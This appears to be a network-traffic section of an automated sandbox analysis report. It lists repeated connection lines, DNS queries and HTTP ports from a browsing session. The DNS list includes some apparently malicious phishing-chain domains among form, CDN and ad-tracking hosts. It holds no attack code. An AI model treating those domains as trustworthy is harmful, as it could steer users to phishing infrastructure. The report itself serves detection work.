        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 23.205.93.160
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: www.childkorea.or.kr
        Source: global trafficDNS traffic detected: DNS query: form.jotform.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: cdn01.jotfor.ms
        Source: global trafficDNS traffic detected: DNS query: cdn02.jotfor.ms
        Source: global trafficDNS traffic detected: DNS query: cdn03.jotfor.ms
        Source: global trafficDNS traffic detected: DNS query: hcaptcha.com
        Source: global trafficDNS traffic detected: DNS query: cdn.jotfor.ms
        Source: global trafficDNS traffic detected: DNS query: submit.jotform.com
        Source: global trafficDNS traffic detected: DNS query: events.jotform.com
        Source: global trafficDNS traffic detected: DNS query: criamaker.com
        Source: global trafficDNS traffic detected: DNS query: v2nt.molouscre.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: ummxywds674y02hzzfgqdtufuyrhly9j15bulhfzvjwjvxpsaen9.belonfal.com
        Source: global trafficDNS traffic detected: DNS query: www.etsy.com
        Source: global trafficDNS traffic detected: DNS query: i.etsystatic.com
        Source: global trafficDNS traffic detected: DNS query: www.dwin1.com
        Source: global trafficDNS traffic detected: DNS query: trkn.us
        Source: global trafficDNS traffic detected: DNS query: www.facebook.com
        Source: global trafficDNS traffic detected: DNS query: s.pinimg.com
        Source: global trafficDNS traffic detected: DNS query: web.btncdn.com
        Source: global trafficDNS traffic detected: DNS query: resources.xg4ken.com
        Source: global trafficDNS traffic detected: DNS query: 8666735.fls.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: cdn.pdst.fm
        Source: global trafficDNS traffic detected: DNS query: analytics.tiktok.com
        Source: global trafficDNS traffic detected: DNS query: pt.ispot.tv
        Source: global trafficDNS traffic detected: DNS query: lantern.roeyecdn.com
        Source: global trafficDNS traffic detected: DNS query: pixels.spotify.com
        Source: global trafficDNS traffic detected: DNS query: ad.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: analytics.google.com
        Source: global trafficDNS traffic detected: DNS query: 9910951.fls.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: ct.pinterest.com
        Source: global trafficDNS traffic detected: DNS query: pixel.streetmetrics.io
        Source: global trafficDNS traffic detected: DNS query: tags.w55c.net
        Source: global trafficDNS traffic detected: DNS query: adservice.google.com
        Source: global trafficDNS traffic detected: DNS query: insight.adsrvr.org
        Source: global trafficDNS traffic detected: DNS query: js.adsrvr.org
        Source: global trafficDNS traffic detected: DNS query: google.com
        Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: lantern.roeye.com
        Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
        Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
        Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
        Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
        Source: global trafficDNS traffic detected: DNS query: ct.captcha-delivery.com
        Source: global trafficDNS traffic detected: DNS query: geo.captcha-delivery.com
        Source: global trafficDNS traffic detected: DNS query: static.captcha-delivery.com
        Source: global trafficDNS traffic detected: DNS query: x.bidswitch.net
        Source: global trafficDNS traffic detected: DNS query: simage2.pubmatic.com
        Source: global trafficDNS traffic detected: DNS query: d.agkn.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
        Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50498 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50532 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50502
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
        Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50501
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50504
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50503
        Source: unknownNetwork traffic detected: HTTP traffic on port 50578 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50506
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
        Source: unknownNetwork traffic detected: HTTP traffic on port 50417 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50505
        Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50508
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50500
        Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
        Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50512
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50514
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50516
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50519
        Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50510
        Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50303 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50523
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
        Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
        Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50525
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50528
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50527
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50521
        Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50396 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
        Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 50556 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 50335 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50370 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50407 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 443
